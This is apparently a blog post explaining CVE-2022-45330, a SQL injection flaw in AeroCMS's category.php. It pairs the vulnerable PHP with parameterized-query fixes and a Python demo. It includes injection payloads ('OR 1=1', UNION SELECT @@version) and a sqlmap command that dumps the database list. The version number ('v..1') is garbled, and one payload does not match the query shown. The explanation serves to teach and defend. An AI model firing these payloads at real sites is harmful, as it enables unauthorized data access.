When it comes to securing web applications, SQL Injection (SQLi) is one of the oldest, and still most dangerous, classes of vulnerability. In this post, we break down CVE-2022-45330, a SQL Injection vulnerability found in AeroCMS v..1. We walk through what the flaw is, show the vulnerable code, review an exploit, explain the fix, and point you to the original resources.
What is AeroCMS?
AeroCMS is a simple open-source Content Management System (CMS) written in PHP. It’s meant for small sites and personal projects.
The Vulnerability: SQL Injection via category.php
In version ..1 of AeroCMS, the category.php file reads a user-supplied query parameter named Category. Because the value is never validated or parameterized, an attacker can use this parameter to send SQL code to the database, leading to SQL Injection.
Here’s the vulnerable PHP code snippet from category.php:

<?php
// category.php (the vulnerable version described in this post)
include('config.php');   // provides $conn, the mysqli connection

if (isset($_GET['Category'])) {
    $category = $_GET['Category'];   // raw, unvalidated user input

    // Vulnerable query: the input is concatenated straight into the SQL string
    $sql = "SELECT * FROM posts WHERE category = '$category'";
    $result = mysqli_query($conn, $sql);
    // ... more code
}
?>
Notice that the user input $category is put directly into the SQL query. There is no sanitization or prepared statement. That’s a classic SQLi mistake.
What Does This Mean?
It means that an attacker can change the behavior of the SQL query by adding malicious SQL code in the Category parameter.
Suppose the attacker goes to
http://example.com/category.php?Category='; OR 1=1--+
The resulting SQL query becomes
SELECT * FROM posts WHERE category = '' OR 1=1--+'
-- starts a MySQL comment that runs to the end of the line, so everything after it (including the closing quote the original query expected) is ignored. The + is URL-encoded whitespace; MySQL only recognizes -- as a comment when it is followed by whitespace, which is why the payload includes it.
This will return all posts in the database, regardless of the intended category.
Extracting Confidential Data
The impact can be worse still: if query results or error messages are reflected on the page (or with a blind approach), an attacker can read data other than posts. For example, to retrieve the database version:
http://example.com/category.php?Category='; UNION SELECT 1,2,@@version--+
The specific payload may vary based on the structure of the original query and the schema.
Here’s a simple exploit using sqlmap (an open-source SQLi tool):
sqlmap -u "http://example.com/category.php?Category=1" --dbs
This tells sqlmap to scan the Category parameter for injection and dump the list of databases.
1. Use Prepared Statements (with parameterized queries)
// category.php (fixed): the value is bound as a parameter, never concatenated
$category = $_GET['Category'] ?? '';
$stmt = $conn->prepare("SELECT * FROM posts WHERE category = ?");
$stmt->bind_param("s", $category);   // "s" binds the value as a string
$stmt->execute();
$result = $stmt->get_result();       // needs the mysqlnd driver; otherwise use bind_result()/fetch()
This binds the input as data of type string, so the database never interprets it as part of the SQL command.
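To make the difference between the two versions concrete, here is an added example (not code from the post or from AeroCMS) that reproduces the behaviour described above in Python against an in-memory SQLite database, standing in for the PHP/MySQL code. The posts table and its rows are constructed sample data; the payload is the one from the post with the "+" already decoded to a space by the web server. The vulnerable function splices the value into the query as category.php does and returns every post; the parameterized function treats the same value as plain data and matches nothing; the validated variant additionally rejects anything that is not a known category before the query runs.

```python
import sqlite3

# Constructed sample data standing in for the AeroCMS "posts" table
# (assumption: only the columns the page's query touches matter here).
SAMPLE_POSTS = [
    (1, "Hello world", "news"),
    (2, "Release notes", "news"),
    (3, "Private draft", "drafts"),
    (4, "Holiday photos", "personal"),
]

# The payload from the post, after the web server decoded "+" to a space.
PAGE_PAYLOAD = "' OR 1=1-- "


def make_db():
    """Build an in-memory database with the constructed sample posts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, category TEXT)"
    )
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", SAMPLE_POSTS)
    return conn


def vulnerable_lookup(conn, category):
    """Mirrors category.php: the raw value is spliced into the SQL string."""
    sql = f"SELECT id, title, category FROM posts WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, category):
    """Parameterized query: the driver passes the value separately from the
    SQL text, so it can only ever be compared as data."""
    sql = "SELECT id, title, category FROM posts WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def allowed_categories(conn):
    """Allowlist of categories that actually exist in the database."""
    return {row[0] for row in conn.execute("SELECT DISTINCT category FROM posts")}


def validated_lookup(conn, category):
    """Defence in depth: reject unknown categories before touching the query,
    then still use the parameterized lookup."""
    if category not in allowed_categories(conn):
        raise ValueError("unknown category")
    return safe_lookup(conn, category)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, legitimate input:", len(vulnerable_lookup(db, "news")), "rows")
    print("vulnerable, payload:         ", len(vulnerable_lookup(db, PAGE_PAYLOAD)), "rows")
    print("parameterized, payload:      ", len(safe_lookup(db, PAGE_PAYLOAD)), "rows")
    try:
        validated_lookup(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("validated, payload: rejected ->", exc)
```

Running it shows the query from the post returning all four rows through the concatenated version, while the parameterized version returns zero rows for the same input and the validated version never reaches the database at all.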
2. Escape Inputs: At the very least, use mysqli_real_escape_string(), keeping in mind that escaping only protects a value that is wrapped in quotes in the query and depends on the connection’s character set. Prepared statements are preferred.
References
- NVD Entry for CVE-2022-45330
- Exploit Database Reference
- Original GitHub Issue
- SQL Injection Explained (OWASP)
In Summary
CVE-2022-45330 is a real-world example of how quickly an attacker can break into a website that handles input improperly. If you’re building with PHP (or any other language that talks to a database), always use prepared statements. AeroCMS v..1 is vulnerable, so patch or remove this software if you’re using it in production.
Timeline
Published on: 11/22/2022 21:15:00 UTC
Last modified on: 11/23/2022 16:04:00 UTC